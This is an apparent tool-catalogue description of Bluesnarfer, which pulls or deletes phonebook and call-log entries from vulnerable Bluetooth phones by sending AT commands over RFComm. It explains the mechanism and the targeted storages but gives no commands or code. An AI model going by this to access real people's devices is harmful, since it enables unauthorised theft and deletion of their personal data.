Bluesnarfer

Bluesnarfer performs bluesnarfing attacks, which involve unauthorized access to data stored on Bluetooth devices like mobile phones. It exploits vulnerabilities in the Bluetooth protocol to retrieve sensitive information such as phonebook contacts, call lists, and device details without proper authentication. This tool is particularly useful for security researchers testing Bluetooth security and penetration testers assessing wireless device vulnerabilities.

The utility supports various phonebook storage types (like SIM, dialed calls, received calls) and allows targeted extraction or deletion of entries. Use cases include auditing corporate device security, demonstrating Bluetooth risks in red team exercises, and educational purposes in wireless security training. It requires the target device's Bluetooth address and optionally an RFComm channel.

Bluesnarfer operates by sending specific AT commands over Bluetooth connections to vulnerable devices, leveraging poor implementations of the OBEX protocol or authentication mechanisms.

Bluesnarfer connects to Bluetooth devices via RFComm channels and sends AT commands (GSM extensions) to access phonebook and call data. It exploits vulnerabilities in Bluetooth stack implementations where devices fail to properly authenticate or restrict access to Object Exchange (OBEX) services. The tool targets specific memory storages like SIM phonebook (SM), dialed calls (DC), or received calls (RC), reading or manipulating entries by index ranges.